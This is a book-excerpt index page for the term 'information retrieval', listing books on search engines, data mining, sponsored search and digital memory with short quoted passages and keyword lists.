information retrieval

156 results back to index


Understanding search engines: mathematical modeling and text retrieval by Michael W. Berry, Murray Browne

information retrieval, PageRank

.), Information Retrieval Data Structures and Algorithms, a 1992 collection of journal articles on various related topics, Gerald Kowalski's (1997) Information Retrieval Systems: Theory and Implementation, a broad overview XI xii Preface to the Second Edition of information retrieval systems, and Ricardo Baeza-Yates and Berthier Ribeiro-Neto's (1999) Modern Information Retrieval, a computer-science perspective of information retrieval, are all fine textbooks on the topic, but understandably they lack the gritty details of the mathematical computations needed to build more successful search engines. With this in mind, USE does not provide an overview of information retrieval systems but prefers to assume the supplementary role to the abovementioned books. Many of the ideas for USE were first presented and developed as part of a Data and Information Management course at the University of Tennessee's Computer Science Department, a course which won the 1997 Undergraduate Computational Engineering and Science Award sponsored by the United States Department of Energy and the Krell Institute.

Further Reading but it does address the subject of IR (indexing, queries, and index construction), albeit from a unique compression perspective. One of the first books that covers various information retrieval topics was actually a collection of survey papers edited by William B. Frakes and Ricardo Baeza-Yates. Their 1992 book [30], Information Retrieval: Dat Structures & Algorithms, contains several seminal works in this area, including the use of signature-based text retrieval methods by Christos Faloutsos and the development of ranking algorithms by Donna Harman. Ricardo Baeza-Yates and Berthier Ribeiro-Neto's [2] Modern Information Retrieval is another collection of well-integrated research articles from various authors with a computer-science perspective of information retrieval. 9.2 Computational Methods and Software Two SIAM Review articles (Berry, Dumais, and O'Brien in 1995 [8] and Berry, Drmac, and Jessup in 1999 [7]) demonstrate the use of linear algebra for vector space IR models such as LSI.

One of the main objectives of this book is to identify to the novice search engine builder, such as the senior level computer science or applied mathematics student or the information sciences graduate student specializing in retrieval systems, the impact of certain decisions that are made at various junctures of this development. One of the major decisions in developing information retrieval systems is selecting and implementing the computational approaches within an integrated software environment. Applied mathematics plays a major role in search engine performance, and Understanding Search Engines (or USE) focuses on this area, bridging the gap between the fields of applied mathematics and information management, disciplines which previously have operated largely in independent domains. But USE does not only fill the gap between applied mathematics and information management, it also fills a niche in the information retrieval literature. The work of William Frakes and Ricardo Baeza-Yates (eds.), Information Retrieval Data Structures and Algorithms, a 1992 collection of journal articles on various related topics, Gerald Kowalski's (1997) Information Retrieval Systems: Theory and Implementation, a broad overview XI xii Preface to the Second Edition of information retrieval systems, and Ricardo Baeza-Yates and Berthier Ribeiro-Neto's (1999) Modern Information Retrieval, a computer-science perspective of information retrieval, are all fine textbooks on the topic, but understandably they lack the gritty details of the mathematical computations needed to build more successful search engines.


pages: 298 words: 43,745

Understanding Sponsored Search: Core Elements of Keyword Advertising by Jim Jansen

AltaVista, barriers to entry, Black Swan, bounce rate, business intelligence, butterfly effect, call centre, Claude Shannon: information theory, complexity theory, correlation does not imply causation, en.wikipedia.org, first-price auction, information asymmetry, information retrieval, intangible asset, inventory management, life extension, linear programming, longitudinal study, megacity, Nash equilibrium, Network effects, PageRank, place-making, price mechanism, psychological pricing, random walk, Schrödinger's Cat, sealed-bid auction, search engine result page, second-price auction, second-price sealed-bid, sentiment analysis, social web, software as a service, stochastic process, telemarketer, the market place, The Present Situation in Quantum Mechanics, the scientific method, The Wisdom of Crowds, Vickrey auction, Vilfredo Pareto, yield management

Journal of the American Society for Information Science and Technology, vol. 56(6), pp. 559–570. [46] Belkin, N. J. 1993. “Interaction with Texts: Information Retrieval as Information-Seeking Behavior.” In Information retrieval ’93. Von der Modellierung zur Anwendung. Konstanz, Germany: Universitaetsverlag Konstanz, pp. 55–66. [47] Saracevic, T. 1997. “Extension and Application of the Stratified Model of Information Retrieval Interaction.” In the Annual Meeting of the American Society for Information Science, Washington, DC, pp. 313–327. [48] Saracevic, T. 1996. “Modeling Interaction in Information Retrieval (IR): A Review and Proposal.” In the 59th American Society for Information Science Annual Meeting, Baltimore, MD, pp. 3–9. [49] Belkin, N., Cool, C., Croft, W. B., and Callan, J. 1993. “The Effect of Multiple Query Representations on Information Retrieval Systems.” In 16th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval, pp. 339–346. [50] Belkin, N., Cool, C., Kelly, D., Lee, H.

In 16th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval, pp. 339–346. [50] Belkin, N., Cool, C., Kelly, D., Lee, H.-J., Muresan, G., Tang, M.-C., and Yuan, X.-J. 2003. “Query Length in Interactive Information Retrieval.” In 26th Annual International ACM 58 [51] [52] [53] [54] [55] [56] [57] [58] [59] [60] [61] [62] [63] Understanding Sponsored Search Conference on Research and Development in Information Retrieval, Toronto, Canada, pp. 205–212. Cronen-Townsend, S., Zhou, Y., and Croft, W. B. 2002. “Predicting Query Performance.” In 25th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval, Tampere, Finland, pp. 299–306. Efthimiadis, E. N. 2000. “Interactive Query Expansion: A User-Based Evaluation in a Relevance Feedback Environment.”

Information overload: refers to the difficulty a person can have understanding an issue and making decisions that can be caused by the presence of too much information (see Chapter 5 customers). Information retrieval: a field of study related to information extraction. Information retrieval is about developing systems to effectively index and search vast amounts of data (Source: SearchEngineDictionary.com) (see Chapter 3 keywords). Information scent: cues related to the desired outcome (see Chapter 3 keywords). Information searching: refers to people’s interaction with information-retrieval systems, ranging from adopting search strategy to judging the relevance of information retrieved (see Chapter 3 keywords). Insertion: actual placement of an ad in a document, as recorded by the ad server (Source: IAB) (see Chapter 2 model). Insertion order: purchase order between a seller of interactive advertising and a buyer (usually an advertiser or its agency) regarding the insertion date(s), number of insertions in a stated period, ad size (or commercial length), and ad placement (or time slot).


Data Mining the Web: Uncovering Patterns in Web Content, Structure, and Usage by Zdravko Markov, Daniel T. Larose

Firefox, information retrieval, Internet Archive, iterative process, natural language processing, pattern recognition, random walk, recommendation engine, semantic web, speech recognition, statistical model, William of Occam

Then we describe briefly the basics of the Web and explore the approaches taken by web search engines to retrieve web pages by keyword search. To do this we look into the technology for text analysis and search developed earlier in the area of information retrieval and extended recently with ranking methods based on web hyperlink structure. All that may be seen as a preprocessing step in the overall process of data mining the web content, which provides the input to machine learning methods for extracting knowledge from hypertext data, discussed in the second part of the book. Data Mining the Web: Uncovering Patterns in Web Content, Structure, and Usage C 2007 John Wiley & Sons, Inc. By Zdravko Markov and Daniel T. Larose Copyright CHAPTER 1 INFORMATION RETRIEVAL AND WEB SEARCH WEB CHALLENGES CRAWLING THE WEB INDEXING AND KEYWORD SEARCH EVALUATING SEARCH QUALITY SIMILARITY SEARCH WEB CHALLENGES As originally proposed by Tim Berners-Lee [1], the Web was intended to improve the management of general information about accelerators and experiments at CERN.

For example, the web page with the phone numbers mentioned above can be indexed by all the terms that occur in the anchor text pointing to it: department, chairs, locations, phone, and numbers. More terms may be collected from other pages pointing to it. This idea was implemented in one of the first search 32 CHAPTER 1 INFORMATION RETRIEVAL AND WEB SEARCH engines, the World Wide Web Worm system [4], and later used by Lycos and Google. This allows search engines to increase their indices with pages that have never been crawled, are unavailable, or include nontextual content that cannot be indexed, such as images and programs. As reported by Brin and Page [5] in 1998, Google indexed 24 million pages and over 259 million anchors. EVALUATING SEARCH QUALITY Information retrieval systems do not have formal semantics (such as that of databases), and consequently, the query and the set of documents retrieved (the response of the IR system) cannot be mapped one to one.

Includes index. 978-0-471-66655-4 (cloth) 1. Data mining. 2. Web databases. I. Larose, Daniel T. II. Title. QA76.9.D343M38 2007 005.74 – dc22 2006025099 Printed in the United States of America 10 9 8 7 6 5 4 3 2 1 For my children Teodora, Kalin, and Svetoslav – Z.M. For my children Chantal, Ellyriane, Tristan, and Ravel – D.T.L. CONTENTS PREFACE xi PART I WEB STRUCTURE MINING 1 2 INFORMATION RETRIEVAL AND WEB SEARCH 3 Web Challenges Web Search Engines Topic Directories Semantic Web Crawling the Web Web Basics Web Crawlers Indexing and Keyword Search Document Representation Implementation Considerations Relevance Ranking Advanced Text Search Using the HTML Structure in Keyword Search Evaluating Search Quality Similarity Search Cosine Similarity Jaccard Similarity Document Resemblance References Exercises 3 4 5 5 6 6 7 13 15 19 20 28 30 32 36 36 38 41 43 43 HYPERLINK-BASED RANKING 47 Introduction Social Networks Analysis PageRank Authorities and Hubs Link-Based Similarity Search Enhanced Techniques for Page Ranking References Exercises 47 48 50 53 55 56 57 57 vii viii CONTENTS PART II WEB CONTENT MINING 3 4 5 CLUSTERING 61 Introduction Hierarchical Agglomerative Clustering k-Means Clustering Probabilty-Based Clustering Finite Mixture Problem Classification Problem Clustering Problem Collaborative Filtering (Recommender Systems) References Exercises 61 63 69 73 74 76 78 84 86 86 EVALUATING CLUSTERING 89 Approaches to Evaluating Clustering Similarity-Based Criterion Functions Probabilistic Criterion Functions MDL-Based Model and Feature Evaluation Minimum Description Length Principle MDL-Based Model Evaluation Feature Selection Classes-to-Clusters Evaluation Precision, Recall, and F-Measure Entropy References Exercises 89 90 95 100 101 102 105 106 108 111 112 112 CLASSIFICATION 115 General Setting and Evaluation Techniques Nearest-Neighbor Algorithm Feature Selection Naive Bayes Algorithm Numerical Approaches Relational Learning References Exercises 115 118 121 125 131 133 137 138 PART III WEB USAGE MINING 6 INTRODUCTION TO WEB USAGE MINING 143 Definition of Web Usage Mining Cross-Industry Standard Process for Data Mining Clickstream Analysis 143 144 147 CONTENTS 7 8 9 ix Web Server Log Files Remote Host Field Date/Time Field HTTP Request Field Status Code Field Transfer Volume (Bytes) Field Common Log Format Identification Field Authuser Field Extended Common Log Format Referrer Field User Agent Field Example of a Web Log Record Microsoft IIS Log Format Auxiliary Information References Exercises 148 PREPROCESSING FOR WEB USAGE MINING 156 Need for Preprocessing the Data Data Cleaning and Filtering Page Extension Exploration and Filtering De-Spidering the Web Log File User Identification Session Identification Path Completion Directories and the Basket Transformation Further Data Preprocessing Steps References Exercises 156 149 149 149 150 151 151 151 151 151 152 152 152 153 154 154 154 158 161 163 164 167 170 171 174 174 174 EXPLORATORY DATA ANALYSIS FOR WEB USAGE MINING 177 Introduction Number of Visit Actions Session Duration Relationship between Visit Actions and Session Duration Average Time per Page Duration for Individual Pages References Exercises 177 MODELING FOR WEB USAGE MINING: CLUSTERING, ASSOCIATION, AND CLASSIFICATION Introduction Modeling Methodology Definition of Clustering The BIRCH Clustering Algorithm Affinity Analysis and the A Priori Algorithm 177 178 181 183 185 188 188 191 191 192 193 194 197 x CONTENTS Discretizing the Numerical Variables: Binning Applying the A Priori Algorithm to the CCSU Web Log Data Classification and Regression Trees The C4.5 Algorithm References Exercises INDEX 199 201 204 208 210 211 213 PREFACE DEFINING DATA MINING THE WEB By data mining the Web, we refer to the application of data mining methodologies, techniques, and models to the variety of data forms, structures, and usage patterns that comprise the World Wide Web.


pages: 593 words: 118,995

Relevant Search: With Examples Using Elasticsearch and Solr by Doug Turnbull, John Berryman

commoditize, crowdsourcing, domain-specific language, finite state, fudge factor, full text search, information retrieval, natural language processing, premature optimization, recommendation engine, sentiment analysis

In reality, there is a discipline behind relevance: the academic field of information retrieval. It has generally accepted practices to improve relevance broadly across many domains. But you’ve seen that what’s relevant depends a great deal on your application. Given that, as we introduce information retrieval, think about how its general findings can be used to solve your narrower relevance problem.[2] 2 For an introduction to the field of information retrieval, we highly recommend the classic text Introduction to Information Retrieval by Christopher D. Manning et al. (Cambridge University Press, 2008); see http://nlp.stanford.edu/IR-book/. 1.3.1. Information retrieval Luckily, experts have been studying search for decades. The academic field of information retrieval focuses on the precise recall of information to satisfy a user’s information need.

Example of making a relevance judgment for the query “Rambo” in Quepid, a judgment list management application Using judgment lists, researchers aim to measure whether changes to text relevance calculations improve the overall relevance of the results across every test collection. To classic information retrieval, a solution that improves a dozen text-heavy test collections 1% overall is a success. Rather than focusing on one particular problem in depth, information retrieval focuses on solving search for a broad set of problems. 1.3.2. Can we use information retrieval to solve relevance? You’ve already seen there’s no silver bullet. But information retrieval does seem to systematically create relevance solutions. So ask yourself: Do these insights apply to your application? Does your application care about solutions that offer incremental, general improvements to searching article-length text? Would it be better to solve the specific problems faced by your application, here and now? To be more precise, classic information retrieval begs several questions when brought to bear on applied relevance problems.

If you’re fortunate, you’ll find a result addressing a problem similar to your own. That information will solve your problem, and you’ll move on. In information retrieval, relevance is defined as the practice of returning search results that most satisfy the user’s information needs. Further, classic information retrieval focuses on text ranking. Many findings in information retrieval try to measure how likely a given article is going to be relevant to a user’s text search. You’ll learn about several of these invaluable methods throughout this book—as many of these findings are implemented in open source search engines. To discover better text-searching methods, information retrieval researchers benchmark different strategies by using test collections of articles. These test collections include Amazon reviews, Reuters news articles, Usenet posts, and other similar, article-length data sets.


Data Mining: Concepts and Techniques: Concepts and Techniques by Jiawei Han, Micheline Kamber, Jian Pei

bioinformatics, business intelligence, business process, Claude Shannon: information theory, cloud computing, computer vision, correlation coefficient, cyber-physical system, database schema, discrete time, distributed generation, finite state, information retrieval, iterative process, knowledge worker, linked data, natural language processing, Netflix Prize, Occam's razor, pattern recognition, performance metric, phenotype, random walk, recommendation engine, RFID, semantic web, sentiment analysis, speech recognition, statistical model, stochastic process, supply-chain management, text mining, thinkpad, Thomas Bayes, web application

Textbooks and reference books on information retrieval include Introduction to Information Retrieval by Manning, Raghavan, and Schutz [MRS08]; Information Retrieval: Implementing and Evaluating Search Engines by Büttcher, Clarke, and Cormack [BCC10]; Search Engines: Information Retrieval in Practice by Croft, Metzler, and Strohman [CMS09]; Modern Information Retrieval: The Concepts and Technology Behind Search by Baeza-Yates and Ribeiro-Neto [BYRN11]; and Information Retrieval: Algorithms and Heuristics by Grossman and Frieder [GR04]. Information retrieval research is published in the proceedings of several information retrieval and Web search and mining conferences, including the International ACM SIGIR Conference on Research and Development in Information Retrieval (SIGIR), the International World Wide Web Conference (WWW), the ACM International Conference on Web Search and Data Mining (WSDM), the ACM Conference on Information and Knowledge Management (CIKM), the European Conference on Information Retrieval (ECIR), the Text Retrieval Conference (TREC), and the ACM/IEEE Joint Conference on Digital Libraries (JCDL).

The data cube model not only facilitates OLAP in multidimensional databases but also promotes multidimensional data mining (see Section 1.3.2). 1.5.4. Information Retrieval Information retrieval (IR) is the science of searching for documents or information in documents. Documents can be text or multimedia, and may reside on the Web. The differences between traditional information retrieval and database systems are twofold: Information retrieval assumes that (1) the data under search are unstructured; and (2) the queries are formed mainly by keywords, which do not have complex structures (unlike SQL queries in database systems). The typical approaches in information retrieval adopt probabilistic models. For example, a text document can be regarded as a bag of words, that is, a multiset of words appearing in the document.

Information retrieval research is published in the proceedings of several information retrieval and Web search and mining conferences, including the International ACM SIGIR Conference on Research and Development in Information Retrieval (SIGIR), the International World Wide Web Conference (WWW), the ACM International Conference on Web Search and Data Mining (WSDM), the ACM Conference on Information and Knowledge Management (CIKM), the European Conference on Information Retrieval (ECIR), the Text Retrieval Conference (TREC), and the ACM/IEEE Joint Conference on Digital Libraries (JCDL). Other sources of publication include major information retrieval, information systems, and Web journals, such as Journal of Information Retrieval, ACM Transactions on Information Systems (TOIS), Information Processing and Management, Knowledge and Information Systems (KAIS), and IEEE Transactions on Knowledge and Data Engineering (TKDE). 2. Getting to Know Your Data It's tempting to jump straight into mining, but first, we need to get the data ready. This involves having a closer look at attributes and data values.


Text Analytics With Python: A Practical Real-World Approach to Gaining Actionable Insights From Your Data by Dipanjan Sarkar

bioinformatics, business intelligence, computer vision, continuous integration, en.wikipedia.org, general-purpose programming language, Guido van Rossum, information retrieval, Internet of things, invention of the printing press, iterative process, natural language processing, out of africa, performance metric, premature optimization, recommendation engine, self-driving car, semantic web, sentiment analysis, speech recognition, statistical model, text mining, Turing test, web application

Once the basics are covered, our objective will be to understand and analyze term similarity, document similarity, and finally document clustering. Important Concepts Our main objectives in this chapter are to understand text similarity and clustering. Before moving on to the actual techniques and algorithms, this section will discuss some important concepts related to information retrieval, document similarity measures, and machine learning. Even though some of these concepts might be familiar to you from the previous chapters, all of them will be useful to us as we gradually journey through this chapter. Without further ado, let’s get started. Information Retrieval (IR) Information retrieval (IR) is the process of retrieving or fetching relevant sources of information from a corpus or set of entities that hold information based on some demand. For example, it could be a query or search that users enter in a search engine and then get relevant search items pertaining to their query.

I recommend using gensim’s hellinger() function, available in the gensim.matutils module (which uses the same logic as our preceding function) when building large-scale systems for analyzing similarity. Okapi BM25 Ranking There are several techniques that are quite popular in information retrieval and search engines, including PageRank and Okapi BM25. The acronym BM stands for best matching. This technique is also known as BM25, but for the sake of completeness I refer to it as Okapi BM25, because originally although the concepts behind the BM25 function were merely theoretical, the City University in London built the Okapi Information Retrieval system in the 1980s–90s, which implemented this technique to retrieve documents on actual real-world data. This technique can also be called a framework or model based on probabilistic relevancy and was developed by several people in the 1970s–80s, including computer scientists S.

Automated Text Classification Text Classification Blueprint Text Normalization Feature Extraction Bag of Words Model TF-IDF Model Advanced Word Vectorization Models Classification Algorithms Multinomial Naïve Bayes Support Vector Machines Evaluating Classification Models Building a Multi-Class Classification System Applications and Uses Summary Chapter 5:​ Text Summarization Text Summarization and Information Extraction Important Concepts Documents Text Normalization Feature Extraction Feature Matrix Singular Value Decomposition Text Normalization Feature Extraction Keyphrase Extraction Collocations Weighted Tag–Based Phrase Extraction Topic Modeling Latent Semantic Indexing Latent Dirichlet Allocation Non-negative Matrix Factorization Extracting Topics from Product Reviews Automated Document Summarization Latent Semantic Analysis TextRank Summarizing a Product Description Summary Chapter 6:​ Text Similarity and Clustering Important Concepts Information Retrieval (IR) Feature Engineering Similarity Measures Unsupervised Machine Learning Algorithms Text Normalization Feature Extraction Text Similarity Analyzing Term Similarity Hamming Distance Manhattan Distance Euclidean Distance Levenshtein Edit Distance Cosine Distance and Similarity Analyzing Document Similarity Cosine Similarity Hellinger-Bhattacharya Distance Okapi BM25 Ranking Document Clustering Clustering Greatest Movies of All Time K-means Clustering Affinity Propagation Ward’s Agglomerative Hierarchical Clustering Summary Chapter 7:​ Semantic and Sentiment Analysis Semantic Analysis Exploring WordNet Understanding Synsets Analyzing Lexical Semantic Relations Word Sense Disambiguation Named Entity Recognition Analyzing Semantic Representations Propositional Logic First Order Logic Sentiment Analysis Sentiment Analysis of IMDb Movie Reviews Setting Up Dependencies Preparing Datasets Supervised Machine Learning Technique Unsupervised Lexicon-based Techniques Comparing Model Performances Summary Index Contents at a Glance About the Author About the Technical Reviewer Acknowledgments Introduction Chapter 1:​ Natural Language Basics Chapter 2:​ Python Refresher Chapter 3:​ Processing and Understanding Text Chapter 4:​ Text Classification Chapter 5:​ Text Summarization Chapter 6:​ Text Similarity and Clustering Chapter 7:​ Semantic and Sentiment Analysis Index About the Author and About the Technical Reviewer About the Author Dipanjan Sarkar is a data scientist at Intel, the world’s largest silicon company, which is on a mission to make the world more connected and productive.


pages: 263 words: 75,610

Delete: The Virtue of Forgetting in the Digital Age by Viktor Mayer-Schönberger

en.wikipedia.org, Erik Brynjolfsson, Firefox, full text search, George Akerlof, information asymmetry, information retrieval, information trail, Internet Archive, invention of movable type, invention of the printing press, John Markoff, Joi Ito, lifelogging, moveable type in China, Network effects, packet switching, Panopticon Jeremy Bentham, pattern recognition, RFID, slashdot, Steve Jobs, Steven Levy, The Market for Lemons, The Structural Transformation of the Public Sphere, Vannevar Bush

See information dossiers Dutch citizen registry, 141, 157–58 DVD, 64–65, 145 eBay, 93, 95 Ecommerce, 131 Egypt, 32 Eisenstein, Elizabeth, 37, 38 e-mails: preservation of, 69 entropy, 22 epics, 25, 26, 27 European Human Rights Convention, 110 European Union Privacy Directive, 158–59, 160 exit, 99 Expedia.com, 8 expiration dates for information, 171–95, 198–99 binary nature of, 192–93 imperfection of, 194–95 negotiating, 185–89, 187 persistence of, 183–85 societal preferences for, 182–83 external memory, limitations of, 34 Facebook, 2, 3, 84, 86, 197 Feldmar, Andrew, 3–4, 5, 104–5, 109, 111, 197 Felten, Edward, 151–52, 188 fiber-optic cables, 80–81 fidelity, 60 filing systems, 74 film, 47 fingerprints, 78 First Amendment, 110 Flash memory, 63 Flickr, 84, 102, 124 flight reservation, 8 Foer, Joshua, 21 forgetting: cost of, 68, 91, 92 human, 19–20, 114–17 central importance of, 13, 21 societal, 13 forgiving, 197 Foucault, Michel, 11, 112 free-riding, 133 Friedman, Lawrence, 106 Gandy, Oscar, 11, 165 Gasser, Urs, 3, 130 “Goblin edits,” 62 Google, 2, 6–8, 70–71, 84, 103, 104, 109, 130–31, 175–78, 179, 186, 197 governmental decision-making, 94 GPS, 9 Graham, Mary, 94 Gutenberg, 37–38 hard disks, 62–63 hieroglyphs, 32 Hilton, Paris, 86 history: omnipresence of, 125 Hotmail, 69 human cognition, 154–57 “Imagined Communities,” 43 index, 73–74, 90 full-text, 76–77 information: abstract, 17 biometric, 9 bundling of, 82–83 control over, 85–87, 91, 97–112, 135–36, 140, 167–68, 181–82 deniability of, 87 decontextualization of, 78, 89–90, 142 economics of, 82–83 incompleteness of, 156 interpretation of, 96 leakages of, 105, 133–34 legally mandated retention of, 160–61 lifespan of, 172 markets for, 145–46 misuse of, 140 peer-to-peer sharing of, 84, 86 processors of, 175–78 production cost of, 82–83 property of, 143 quality of, 96–97 recall of, 18–19 recombining of, 61–62, 85, 88–90 recontextualization of, 89–90 retrieval of, 72–79 risk of collecting, 158 role of, 85 self-disclosure of, 4 sharing of, 3, 84–85 total amount of, 52 information control: relational concepts of, 153 information dossiers, 104 digital, 123–25 information ecology, 157–63 information power, 112 differences in, 107, 133, 187, 191, 192 information privacy, 100, 108, 135, 174, 181–82 effectiveness of rights to, 135–36, 139–40, 143–44 enforcement of right to, 139–40 purpose limitation principle in, 136, 138, 159 rights to, 134–44 information retrieval. See information: retrieval of information sharing: default of, 88 information storage: capacity, 66 cheap, 62–72 corporate, 68–69 density of, 71 economics of, 68 increase in, 71–72 magnetic, 62–64 optical, 64–65 relative cost of, 65–66 sequential nature of analog, 75 informational self-determination, 137 relational dimension of, 170 intellectual property (IP), 144, 146, 150, 174 Internet, 79 “future proof,” 59–60 peer-production and, 131–32 Internet archives, 4 Islam: printing in, 40 Ito, Joi, 126 Johnson, Deborah, 14 Keohane, Robert, 98 Kodak, Eastman, 45–46 Korea: printing in, 40 language, 23–28 Lasica, J.

The likely medium-term outcome is that storage capacity will continue to double and storage costs to halve about every eighteen to twenty-four months, leaving us with an abundance of cheap digital storage. Easy Retrieval Remembering is more than committing information to memory. It includes the ability to retrieve that information later easily and at will. As humans, we are all too familiar with the challenges of information retrieval from our brain’s long-term memory. External analog memory, like books, hold huge amounts of information, but finding a particular piece of information in it is difficult and time-consuming. Much of the latent value of stored information remains trapped, unlikely to be utilized. Even though we may have stored it, analog information that cannot be retrieved easily in practical terms is no different from having been forgotten.

Even though we may have stored it, analog information that cannot be retrieved easily in practical terms is no different from having been forgotten. In contrast, retrieval from digital memory is vastly easier, cheaper, and swifter: a few words in the search box, a click, and within a few seconds a list of matching information is retrieved and presented in neatly formatted lists. Such trouble-free retrieval greatly enhances the value of information. To be sure, humans have always tried to make information retrieval easier and less cumbersome, but they faced significant hurdles. Take written information. The switch from tablets and scrolls to bound books helped in keeping information together, and certainly improved accessibility, but it did not revolutionize retrieval. Similarly, libraries helped amass information, but didn’t do as much in tracking it down. Only well into the second millennium, when workable indices of book collections (initially perhaps developed out of the extensive organization into subdivisions, later chapters and verses of Hebrew and Christian scriptures) became common, were librarians able to locate a book based on title and author.30 It took centuries of refinement to develop standardized book cataloguing and shelving techniques, as part of the rise of the modern library.


pages: 290 words: 73,000

Algorithms of Oppression: How Search Engines Reinforce Racism by Safiya Umoja Noble

A Declaration of the Independence of Cyberspace, affirmative action, Airbnb, borderless world, cloud computing, conceptual framework, crowdsourcing, desegregation, Donald Trump, Edward Snowden, Filter Bubble, Firefox, Google Earth, Google Glasses, housing crisis, illegal immigration, immigration reform, information retrieval, Internet Archive, Jaron Lanier, Mitch Kapor, Naomi Klein, new economy, PageRank, performance metric, phenotype, profit motive, Silicon Valley, Silicon Valley ideology, Snapchat, Tim Cook: Apple, union organizing, women in the workforce, yellow journalism

In a broader sense, however, Tefko Saracevic, a professor emeritus of information science at Rutgers, suggests that information is constituted through “cognitive processing and understanding.”41 There is a pivotal relationship between information and users that is dependent on human understanding. It is this point that I want to emphasize in the context of information retrieval: information provided to a user is deeply contextualized and stands within a frame of reference. For this reason, it is important to study the social context of those who are organizing information and the potential impacts of the judgments inherent in informational organization processes. Information must be treated in a context; “it involves motivation or intentionality, and therefore it is connected to the expansive social context or horizon, such as culture, work, or problem-at-hand,” and this is fundamental to the origins of information science and to information retrieval.42 Information retrieval as a practice has become a highly commercialized industry, predicated on federally funded experiments and research initiatives, leading to the formation of profitable ventures such as Yahoo!

Saracevic notes that “the domain of information science is the transmission of the universe of human knowledge in recorded form, centering on manipulation (representation, organization, and retrieval) of information, rather than knowing information.”43 This foregrounds the ways that representations in search engines are decontextualized in one specific type of information-retrieval process, particularly for groups whose images, identities, and social histories are framed through forms of systemic domination. Although there is a long, broad, and historical context for addressing categorizations, the impact of learning from these traditions has not yet been fully realized.44 Attention to “the universe of human knowledge” is suggestive for contextualizing information-retrieval practices this way, leading to inquiries into the ways current information-retrieval practices on the web, via commercial search engines, make some types of information available and suppress others. The present focus on the types of information presented in identity-based searches shows that they are removed from the social context of the historical representations and struggles over disempowering forms of representation.

., not working at the level of code) to engage in sharing links to and from websites.31 Research shows that users typically use very few search terms when seeking information in a search engine and rarely use advanced search queries, as most queries are different from traditional offline information-seeking behavior.32 This front-end behavior of users appears to be simplistic; however, the information retrieval systems are complex, and the formulation of users’ queries involves cognitive and emotional processes that are not necessarily reflected in the system design.33 In essence, while users use the simplest queries they can in a search box because of the way interfaces are designed, this does not always reflect how search terms are mapped against more complex thought patterns and concepts that users have about a topic. This disjunction between, on the one hand, users’ queries and their real questions and, on the other, information retrieval systems makes understanding the complex linkages between the content of the results that appear in a search and their import as expressions of power and social relations of critical importance.


pages: 291 words: 77,596

Total Recall: How the E-Memory Revolution Will Change Everything by Gordon Bell, Jim Gemmell

airport security, Albert Einstein, book scanning, cloud computing, conceptual framework, Douglas Engelbart, full text search, information retrieval, invention of writing, inventory management, Isaac Newton, John Markoff, lifelogging, Menlo Park, optical character recognition, pattern recognition, performance metric, RAND corporation, RFID, semantic web, Silicon Valley, Skype, social web, statistical model, Stephen Hawking, Steve Ballmer, Ted Nelson, telepresence, Turing test, Vannevar Bush, web application

Cathal Gurrin’s Web page is http://www.computing.dcu.ie/~cgurrinand here are some of his papers about e-memories. Doherty, A., C. Gurrin, G. Jones, and A. F. Smeaton. “Retrieval of Similar Travel Routes Using GPS Tracklog Place Names.” SIGIR 2006—Conference on Research and Development on Information Retrieval, Workshop on Geographic Information Retrieval, Seattle, Washington, August 6-11, 2006. Gurrin, C., A. F. Smeaton, D. Byrne, N. O’Hare, G. Jones, and N. O’Connor. “An Examination of a Large Visual Lifelog.” AIRS 2008—Asia Information Retrieval Symposium, Harbin, China, January 16-18, 2008. Lavelle, B., D. Byrne, C. Gurrin, A. F. Smeaton, and G. Jones. “Bluetooth Familiarity: Methods of Calculation, Applications and Limitations.” MIRW 2007—Mobile Interaction with the Real World, Workshop at the MobileHCI07: 9th International Conference on Human Computer Interaction with Mobile Devices and Services, Singapore, September 9, 2007.

“Physical Context for Just-in-Time Information Retrieval.” IEEE Transactions on Computers 52, no. 8 (August): 1011-14. ———. 1997. “The Wearable Remembrance Agent: A System for Augmented Memory.” Special Issue on Wearable Computing, Personal Technologies Journal 1:218-24. Rhodes, Bradley J. “Margin Notes: Building a Contextually Aware Associative Memory” (html), to appear in The Proceedings of the International Conference on Intelligent User Interfaces (IUI ’00), New Orleans, Louisiana, January 9-12, 2000. Rhodes, Bradley, and Pattie Maes. 2000. “Just-in-Time Information Retrieval Agents.” Special issue on the MIT Media Laboratory, IBM Systems Journal 39, nos. 3 and 4: 685-704. Rhodes, Bradley, and Thad Starner. “The Remembrance Agent: A Continuously Running Automated Information Retrieval System. The Proceedings of the First International Conference on the Practical Application of Intelligent Agents and Multi Agent Technology (PAAM ’96), London, UK, April 1996, 487-95.

Ellis. “Multimodal Segmentation of Lifelog Data.” Eighth RIAO Conference—Large-Scale Semantic Access to Content (Text, Image, Video and Sound), Pittsburgh, Pennsylvania, May 30-June 1, 2007. Lee, Hyowon, Alan F. Smeaton, Noel E. O’Connor, and Gareth J. F. Jones. “Adaptive Visual Summary of LifeLog Photos for Personal Information Management.” AIR 2006—First International Workshop on Adaptive Information Retrieval, Glasgow, UK, October 14, 2006. O’Conaire, C., N. O’Connor, A. F. Smeaton, and G. Jones. “Organizing a Daily Visual Diary Using Multi-Feature Clustering.” SPIE Electronic Imaging—Multimedia Content Access: Algorithms and Systems (EI121), San Jose, California, January 28-February 1, 2007. Smeaton, A. F. “Content vs. Context for Multimedia Semantics: The Case of SenseCam Image Structuring.”


pages: 193 words: 19,478

Memory Machines: The Evolution of Hypertext by Belinda Barnet

augmented reality, Benoit Mandelbrot, Bill Duvall, British Empire, Buckminster Fuller, Claude Shannon: information theory, collateralized debt obligation, computer age, conceptual framework, Douglas Engelbart, Douglas Engelbart, game design, hiring and firing, Howard Rheingold, HyperCard, hypertext link, information retrieval, Internet Archive, John Markoff, linked data, mandelbrot fractal, Marshall McLuhan, Menlo Park, nonsequential writing, Norbert Wiener, publish or perish, Robert Metcalfe, semantic web, Steve Jobs, Stewart Brand, technoutopianism, Ted Nelson, the scientific method, Vannevar Bush, wikimedia commons

